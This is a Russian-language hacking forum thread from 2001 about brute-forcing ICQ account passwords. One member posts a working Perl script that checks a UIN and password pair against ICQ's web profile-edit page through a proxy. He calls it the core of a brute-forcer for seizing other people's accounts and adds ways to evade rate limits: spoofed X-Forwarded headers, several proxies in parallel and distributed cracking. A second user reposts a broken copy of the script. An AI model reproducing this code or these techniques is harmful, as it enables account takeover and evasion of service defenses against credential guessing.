Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| |
Распечатай и повесь на стену :) 30.11.01 16:19 Число просмотров: 1382
Автор: !mm <Ivan Ch.> Статус: Elderman
|
|
<hacking>
|
ICQ/подбор паролей 28.11.01 13:39 Штраф: 10 [NiFi...]
Автор: iDM Статус: Незарегистрированный пользователь
|
Использую ICQ SubMashineGun.
через icq1.mirabilis.com 4000-порт удается сделать только 7 попыток, затем постоянно timeout,relogin. Спустя какое то время можно сделать еще 7 попыток и т.д. Как убрать ограничение на количесво попыток?
Спасибо.
|
|
сорри 30.11.01 18:50
Автор: amzuk <Kuzma> Статус: Member Отредактировано 01.12.01 20:28 Количество правок: 1
|
|
|
и что с этим текстом делать??? 30.11.01 15:42
Автор: Natyral Статус: Незарегистрированный пользователь
|
#!/usr/local/bin/perl
############################################################
# Configuration
# Your proxy server
$host="127.0.0.1";
$host1="web.icq.com";
$port="3128";
$data_length=length($data);
$path="http://web.icq.com/whitepages/change_details/1,,,00.html";
############################################################
print <<END;
Content-Type: text/html\n\n
<html>
<head>
<title>ICQ Paasword Checker</title>
</head>
<body>
ICQ Paasword Checker<p>
END
############################################################
print "Proxy: $host<br>\n";
print "Port: $port<br>\n";
print "Path: $path<br>\n";
print "DataLength: $data_length\n";
print "Host asked to use: $host1<p>\n\n\n";
use IO::Socket;
my ($remote) = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port);
(die "can't connect: $!\n") unless scalar ($remote);
print $remote "POST $path HTTP/1.0\n";
print $remote "Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,/;
print $remote "Accept-Language: ru,en\n";
print $remote "Accept-Charset: windows-1251,koi8-r,iso-8859-5,cp866,*\n";
print $remote "Content-Type: application/x-www-form-urlencoded\n";
print $remote "Accept-Encoding: gzip, deflate\n";
print $remote "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)\n";
print $remote "Host: $host1\n";
print $remote "Content-Length: $data_length\n";
print $remote "Proxy-Connection: Keep-Alive\n";
print $remote "Pragma: no-cache\n";
print $remote "Cookie: KarmaLogin=C6E09CBAA76BF435CB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DEF805CEDADAC4EB5AAABBB5541B9; KarmaService4=Yes; uin=123456; KarmaLogin=C6E09CBAA7635CDE675AB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DF805CEDAD54EB5AAABBB5541B9; KarmaService4=Yes; uin=123456\n\n";
print $remote "uService=4&Uin=123456&Password=pas%20%20w&SEND=Submit";
# pas%20%20w - Пасс, "pas w"
# 123456 - номер аси
my (@lines) = <$remote>;
close $remote;
# print "@lines";
$error="1";
foreach $line (@lines) {
if ( $line =~ /Update Details of ICQ/ ){
$error=0;
}
}
if ($error == 1){
# Zapuskat programmu otsuda!
print "Error!\n";
foreach $line(@lines) {
print "$line";
}
}
else {
print "<h3>Result?!</h3>\n<br>";
foreach $line(@lines) {
print "$line";
}
}
############################################################
print <<END;
</html></body>
END
############################################################
1;
что с этим текстом делать?
|
| |
Распечатай и повесь на стену :) 30.11.01 16:19
Автор: !mm <Ivan Ch.> Статус: Elderman
|
|
| | |
Что есть ПЕРЛ 30.11.01 16:23
Автор: Natyral Статус: Незарегистрированный пользователь
|
Уже распечатал и повесил, а что такое перл?
|
| | | |
Сокр.:Перловая каша, поисковик тебе поможет 30.11.01 18:11
Автор: NiFi... <NiFiGaSebe!> Статус: Member
|
|
|
ICQ/подбор паролей 30.11.01 14:27
Автор: Necto Статус: Незарегистрированный пользователь
|
> Использую ICQ SubMashineGun. > через icq1.mirabilis.com 4000-порт удается сделать только > 7 попыток, затем постоянно timeout,relogin. Спустя какое то > время можно сделать еще 7 попыток и т.д. Как убрать > ограничение на количесво попыток? > Спасибо.
Незнаю конечно, я здесь написал свое мнение по поводу этой проги http://www.mazafaka.ru/forum/viewtopic.php?topic=67&forum=2&10
|
| |
ICQ/подбор паролей-угадай кто этот ДЯДЯ?=) 07.12.01 20:17
Автор: ud Статус: Незарегистрированный пользователь Отредактировано 07.12.01 20:22 Количество правок: 1
|
> > Использую ICQ SubMashineGun. > > через icq1.mirabilis.com 4000-порт удается сделать > только > > 7 попыток, затем постоянно timeout,relogin. Спустя > какое то > > время можно сделать еще 7 попыток и т.д. Как убрать > > ограничение на количесво попыток? > > Спасибо. > > Незнаю конечно, я здесь написал свое мнение по поводу этой > проги > http://www.mazafaka.ru/forum/viewtopic.php?topic=67&forum=2 > &10
=))))))))))
|
| | |
хыхы... удэшник, там в твоей мессаге 1 правка, это ты количество скобок в смайлике правил? :-))) 08.12.01 00:29
Автор: hex.sex <Computer-Hitler> Статус: Elderman
|
|
|
ICQ/подбор паролей 28.11.01 14:41
Автор: !mm <Ivan Ch.> Статус: Elderman
|
> время можно сделать еще 7 попыток и т.д. Как убрать > ограничение на количесво попыток?
Там насколько я знаю стоит ограничение попыток. Т.е. бесполезно что-то делать.
|
| |
ICQ/подбор паролей- Забудь об этом(ins) 29.11.01 03:53
Автор: RHoST Статус: Незарегистрированный пользователь
|
Да это действительно так, там стоит ограничение на 7 попыток. НО! Когда я писал летом свой переборщик, я сделал задержку между паролями регулируемой. Это позволяло перебирать пароли всю ночь
. но скорость получилась потрясающе низкая - 1 пароль в 2-3 секунды.
Несмотря на то что она написана на ЛОГИН пакете аськи 2000b.
СНИФ версии сабмашинГАНа которая была у меня показал что она юзает UDP пакеты без шифрования пароля, т.е старую версию протокола. Есст-но что это все убивает всякую мечту о брутфорсе.
Была идея подключаться через несколько прокси серверов, но руки так и не дошли. Все равно я писал ее для развлечения, поэтому она так и осталась в сыром состоянии.
Так что можешь забыть о переборе паролей. Слишком медленно будет. Если конечно ты не решишся на написание своего переборщика через 10 прокси серверов. ;)))
|
| | |
ICQ/подбор паролей- Не надо забывать об этом! 30.11.01 15:12
Автор: NiFi... <NiFiGaSebe!> Статус: Member Отредактировано 01.12.01 09:30 Количество правок: 2
|
Все это конечно хорошо, но зачем забывать о том, что можно делать логин
через веб, чтобы попытаться изменить свою инфу. Это значит, что написав
программу на перле, можно сделать переборщик, который будет очень
быстры. Если учитывать то, что эти идиоты даже не поставили проверку
на REFERER, то....
хммм...у меня нет слов.
Более того, айпишник не блокируется.
Дальше - дальнейшие навороты:
1) Посылаем в пакете каждый раз новое значение поля X-Forwarded 4. Это
заставит админов и возможно сам софт думать что запросы идут с
разных компов за прокси серваком.
2) Дальше, дописываем скрипт так, чтобы он был мультиконнектным и
сразу через несколько проксей проверял. Скорость увеличится как
говорится dramatically.
3) Разрабатываем distributed сеть. Еще сложнее, но увеличит скорость еще
в несколько раз. Это когда перл скрипт установлен на многих компах,...
и списки пассов, которые надо проверить собираются с главного сервера.
Если все это исполнить, то сосать будет не только тот, чью аську
скоммуниздили, но и администраторы мираба.
ПОСЛЕСЛОВИЕ: Не забываем, что у паролей для аси - ограниченный
размер. Это делает брутфорс - реальным занятием.
НО! Все предложенные модернизации требуют много умственных и
физических усилий, и создается вопрос: А НАДО ЛИ ОНО НАМ ВООБЩЕ???
Для того, чтобы доказать, что это пашет, я написал простой Перл скрипт,
который проверяет, правильный ли пароль для эккаунта или нет.
Простой Брутфорсер из этого скрипта сделать несложно - достаточно
всего лишь приделать туда модуль генерации паролей.
Листинг:
======================= Кат @#$ ==========================
#!/usr/local/bin/perl
############################################################
# Configuration
# Your proxy server
$host="127.0.0.1";
$host1="web.icq.com";
$port="3128";
$data="uService=4&Uin=123456&Password=pas%20%20w&SEND=Submit";
# pas%20%20w - Пасс, "pas w"
# 123456 - номер аси
$data_length=length($data);
$path="http://web.icq.com/whitepages/change_details/1,,,00.html";
############################################################
print <<END;
Content-Type: text/html\n\n
<html>
<head>
<title>ICQ Paasword Checker</title>
</head>
<body>
ICQ Paasword Checker<p>
END
############################################################
print "Proxy: $host<br>\n";
print "Port: $port<br>\n";
print "Path: $path<br>\n";
print "DataLength: $data_length\n";
print "Host asked to use: $host1<p>\n\n\n";
use IO::Socket;
my ($remote) = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port);
(die "can't connect: $!\n") unless scalar ($remote);
print $remote "POST $path HTTP/1.0\n";
print $remote "Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,/;
print $remote "Accept-Language: ru,en\n";
print $remote "Accept-Charset: windows-1251,koi8-r,iso-8859-5,cp866,*\n";
print $remote "Content-Type: application/x-www-form-urlencoded\n";
print $remote "Accept-Encoding: gzip, deflate\n";
print $remote "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)\n";
print $remote "Host: $host1\n";
print $remote "Content-Length: $data_length\n";
print $remote "Proxy-Connection: Keep-Alive\n";
print $remote "Pragma: no-cache\n";
print $remote "Cookie: KarmaLogin=C6E09CBAA76BF435CB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DEF805CEDADAC4EB5AAABBB5541B9; KarmaService4=Yes; uin=123456; KarmaLogin=C6E09CBAA7635CDE675AB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DF805CEDAD54EB5AAABBB5541B9; KarmaService4=Yes; uin=123456\n\n";
print $remote "$data";
my (@lines) = <$remote>;
close $remote;
$error=1;
foreach $line (@lines) {
if ( $line =~ /Update Details of ICQ/ ){
$error=0;
}
}
if ($error == 1){
print "Error!\n";
foreach $line(@lines) {
print "$line";
}
}
else {
print "<h3>Result?!</h3>\n<br>";
print "Definitely positive!\n<br>";
}
############################################################
print <<END;
</html></body>
END
############################################################
1;
---
======================= Кат @#$ ==========================
> Да это действительно так, там стоит ограничение на 7 > попыток. НО! Когда я писал летом свой переборщик, я сделал > задержку между паролями регулируемой. Это позволяло > перебирать пароли всю ночь > . но скорость получилась потрясающе низкая - 1 пароль в 2-3 > секунды. > Несмотря на то что она написана на ЛОГИН пакете аськи > 2000b. > СНИФ версии сабмашинГАНа которая была у меня показал что > она юзает UDP пакеты без шифрования пароля, т.е старую > версию протокола. Есст-но что это все убивает всякую мечту > о брутфорсе. > Была идея подключаться через несколько прокси серверов, но > руки так и не дошли. Все равно я писал ее для развлечения, > поэтому она так и осталась в сыром состоянии. > Так что можешь забыть о переборе паролей. Слишком медленно > будет. Если конечно ты не решишся на написание своего > переборщика через 10 прокси серверов. ;)))
|
| | | |
ICQ/подбор паролей- Не надо забывать об этом! 30.11.01 16:14
Автор: !mm <Ivan Ch.> Статус: Elderman
|
> > Была идея подключаться через несколько прокси > серверов, но > > руки так и не дошли. Все равно я писал ее для > развлечения, > > поэтому она так и осталась в сыром состоянии. > > Так что можешь забыть о переборе паролей. Слишком > медленно > > будет. Если конечно ты не решишся на написание своего > > переборщика через 10 прокси серверов. ;)))
> Все это конечно хорошо, но зачем забывать о том, что можно > делать логин > через веб, чтоб попытаться изменить свою инфу. Это значит, > что написав > программу на перле, можно сделать переборщик, который будет > очень
:))) Два диаметрально противоположных мнения :))) Душа радуется, когда за дело берутся профессионалы :)
P.S. прога на Перле действительно быстра.. Тока я ее чуть поправил :)
Сенькс.
|
| | | | |
ICQ/подбор паролей- Не надо забывать об этом! 01.12.01 09:33
Автор: NiFi... <NiFiGaSebe!> Статус: Member
|
> P.S. прога на Перле действительно быстра..
>Тока я ее чуть поправил :)
да уж. я впопыхах там несколько вещей исказил, зато сейчас все поправил так как должно быть.
Интересно, а что поправлял ты?
> Сенькс. Да не за что. Писал давно, нужно было при кое-каких экспермиентах быстро проверять подходит ли пасс или нет, ломало каждый раз в бравзере самому проверять или тем более через саму асю.
|
| | | | |
ICQ/подбор паролей- Не надо забывать об этом! 01.12.01 02:22
Автор: petka Статус: Незарегистрированный пользователь
|
> > > Была идея подключаться через несколько прокси > > серверов, но > > > руки так и не дошли. Все равно я писал ее для > > развлечения, > > > поэтому она так и осталась в сыром состоянии. > > > Так что можешь забыть о переборе паролей. Слишком > > медленно > > > будет. Если конечно ты не решишся на написание > своего > > > переборщика через 10 прокси серверов. ;))) > > > Все это конечно хорошо, но зачем забывать о том, что > можно > > делать логин > > через веб, чтоб попытаться изменить свою инфу. Это > значит, > > что написав > > программу на перле, можно сделать переборщик, который > будет > > очень > > :))) Два диаметрально противоположных мнения :))) Душа > радуется, когда за дело берутся профессионалы :) > > P.S. прога на Перле действительно быстра.. Тока я ее чуть > поправил :) > Сенькс.
Что то у меня етот скрипт не пашет, выскакивает на ету строчку все время ((die "can't connect: $!\n") unless scalar ($remote);), народ в чем могет быть трабла, а то я сам с перлом на вы.
|
| | | | | |
Icq/подбор паролей- нет! все-таки надо забыть об этом! 01.12.01 09:04
Автор: NiFi... <NiFiGaSebe!> Статус: Member
|
> Что то у меня етот скрипт не пашет, выскакивает на ету > строчку все время ((die "can't connect: $!\n") unless > scalar ($remote);), народ в чем могет быть трабла, а то я > сам с перлом на вы. Ну начинается...
Не знаешь, возьми книжки, почитай. Я выложил готовое решение,
и тут еще тупые вопросы начинаются.
Сам подумай, что значит эта ошибка и как ее исправить. Для этого знания перла не нужны.
Все, закрываю это обсуждение.
|
|
|